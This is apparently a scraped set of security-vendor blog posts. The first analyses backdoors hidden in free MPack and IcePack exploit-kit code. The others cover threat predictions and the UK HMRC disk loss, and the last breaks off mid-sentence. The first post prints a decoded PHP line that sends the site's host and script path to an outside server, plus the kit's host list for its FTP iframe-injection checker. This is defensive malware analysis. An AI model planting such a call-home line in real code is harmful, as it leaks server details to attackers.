hacked credit card number
(Click for larger image)
This eventually leads to an iframe tag being added to the visitors page, redirecting them to the Russian Mpack server. We have also observed what appears to have been a backdoor within the free IcePack code. This backdoor is encoded in base64 so it stands out a little more in the code and thus is easier to spot; however, it is appended at the end of a long line of unrelated code so unless you scroll all the way to the right it might be missed. Again displayed here is the result of decoding the original line of code:
file_get_contents('http://[removed].in/c.php?host=' . $_SERVER['HTTP_HOST'] . '&root=' . $_SERVER['SCRIPT_FILENAME']);This server is not returning anything interesting at the moment, so it is hard to tell what exactly its function is. Perhaps it was used to track the number of installations? However, from where is placed and from the way it is encoded we have no doubt that this code is up to no good.
Another interesting line of code take from the free IcePack code is a list of servers where the distributors would prefer you not to add iframes. IcePack contains an ftp checker script that can log into legitimate ftp servers in order to add a redirect to an exploit server. (Normally achieved by adding an iframe tag) Before logging in to the an ftp server the IcePack code first checks if the Web site is on the banned list - shown below - and if it is, it blocks the login attempt:
$bad_hosts = array ( 'boom.ru', 'narod.ru', 'jino-net.ru', 'fatal.ru', 'h10.ru', 'h11.ru', 'h12.ru', 'h13.ru', 'h14.ru', 'h15.ru', 'h16.ru', '110mb.com', 'by.ru', 'tripod.com');This $bad_hosts list shows sites where the people who released this free IcePack code would prefer you not to put iframes. Perhaps these are sites they use or control, but it’s not surprising that most of these sites are Russian (both Mpack and IcePack are coded by Russian groups).
Since we have not purchased the real versions of these packs we cannot say for certain that any / all of the code mentioned here is not included in the real version of these packs. It just goes to show that the same caution is needed in the underground just as in the real world; caveat emptor. As for the free versions of these packs, if something looks too good to be true, it probably is.
All of the exploits contained in these free exploit packs are detected by Symantec products with the latest definitions.
Last week, we talked about the year in review. And now, everyone wants to know what will happen next. Well, I don't claim to be a clairvoyant, but it’s safe to say that the following areas will be interesting to watch in the coming year:
o Election Campaigns – As political candidates increasingly turn to the Internet, it is important to understand the associated IT security risks of increased dependence and interdependence on technology in the election process. These risks include, among others, the diversion of online campaign donations; dissemination of misinformation; fraud; phishing; and the invasion of privacy.
o Bot Evolution – We expect bots to diversify and evolve in their behavior. For example, we may see things like phishing sites hosted by bot zombies.
o Advanced Web Threats – As the number of available Web services increases and as browsers continue to converge on a uniform interpretation standard for scripting languages, such as JavaScript, Symantec expects the number of new Web-based threats to continue to increase.
o Mobile Platforms – Interest in mobile security has never been higher. As phones become more complex, more interesting and more connected, we expect attackers to take advantage.
o Spam Evolution – Symantec expects to see spam continuously evolve in order to evade traditional blocking systems and trick users into reading messages.
o Virtual Worlds - Symantec expects that as the use of persistent virtual worlds (PVWs) and massively multiplayer online games (MMOGs) expands, new threats will emerge as criminals, phishers, spammers, and others turn their attention to these new communities.
While the scale of the data loss by the UK’s Revenue and Customs is indeed stunning, there is still no indication that the missing disks containing information from 25 million UK residents has actually fallen into unfriendly hands. However, this is now almost irrelevant as we in the security industry sit and wait for the first scam or phishing attack that plays on people’s doubts and fears.
For those unaware of this issue, on November 20th Her Majesty’s Revenue & Customs (HMRC - the UK's tax and excise agency) acknowledged that it had lost two computer disks containing large amounts of confidential information, including names, addresses, dates of birth, and in some cases bank account information. The missing disks — apparently lost while being transported — may include information on as many as 25 million individuals, including recipients of child benefits.
HMRC believe the disks are still within one of their sites, but after an exhaustive search, they have failed to materialize. So, imagine if you or your family receive an email purporting to be from the Child Benefit Helpline, asking you to visit a certain Web site to input your name, address, national insurance number, and even bank account details so that they can be checked against records to see if your details have been compromised. Or, just think if you receive an email askin